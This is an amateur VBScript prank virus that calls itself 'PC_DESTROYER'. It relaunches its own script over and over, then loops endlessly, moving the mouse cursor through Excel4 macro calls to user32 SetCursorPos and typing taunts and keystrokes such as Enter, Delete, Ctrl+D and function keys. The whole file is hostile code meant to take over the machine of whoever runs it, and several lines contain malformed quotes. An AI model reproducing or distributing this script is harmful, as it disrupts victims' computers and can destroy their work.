 Set auto=CreateObject("wscript.shell")
 CreateObject("WScript.Shell").Run WScript.ScriptFullName
 auto.sendkeys "UR PC IS FUCKED BY PC_DESTROYER"
 Dim Excel: Set Excel = WScript.CreateObject("Excel.Application") 
 do
Excel.ExecuteExcel4Macro "CALL(""user32"",""SetCursorPos"",""JJJ"",""0"",""0"")"
    auto.sendkeys "{enter}"
    auto.sendkeys "^%l"
    auto.sendkeys "{F11}"
    auto.sendkeys "{PRTSC},ags"
    auto.sendkeys "{RIGHT}"
    auto.sendkeys "{enter}"
    auto.sendkeys "^%l"
    auto.sendkeys "rizz grimice ohio"
 Excel.ExecuteExcel4Macro "CALL(""user32"",""SetCursorPos"",""JJJ"",""0"",""5000"")"
    auto.sendkeys "VIRUS AHHAHAHAH"
 Excel.ExecuteExcel4Macro "CALL(""user32"",""SetCursorPos"",""JJJ"",""250"",""0"")"
    auto.sendkeys "dsgsdfs"
 Excel.ExecuteExcel4Macro "CALL(""user32"",""SetCursorPos"",""JJJ"",""356"",""355"")"
    auto.sendkeys "{UP}"
        auto.sendkeys "{enter}"
    auto.sendkeys "HAHAHAH"
        auto.sendkeys "{enter}"
 auto.sendkeys "free bobux"
 Excel.ExecuteExcel4Macro "CALL(""user32"",""SetCursorPos"",""JJJ””,””350””,”500””)”
    auto.sendkeys "{F8}"
    auto.sendkeys "{F9}"
    auto.sendkeys "abcqertyuiofvbnh"
    auto.sendkeys "{del}"
    auto.sendkeys  "^d"
    auto.sendkeys "{F12}"
 Excel.ExecuteExcel4Macro "CALL(""user32"",""SetCursorPos"",""JJJ"",""5000"",""0"")"
    auto.sendkeys "{LEFT}"
auto.sendkeys "{DOWN}"
    auto.sendkeys "memz"
    auto.sendkeys "free bobux"
    auto.sendkeys "{F8}"
    auto.sendkeys "{F9}"
 Excel.ExecuteExcel4Macro "CALL(""user32"",""SetCursorPos"",""JJJ””,””3000””,””0””)”
    auto.sendkeys "{del}"
        auto.sendkeys "{enter}"
    auto.sendkeys "{LEFT}"
auto.sendkeys "{DOWN}"
Excel.ExecuteExcel4Macro "CALL(""user32"",""SetCursorPos"",""JJJ"",""5000"",""5000"")"
loop
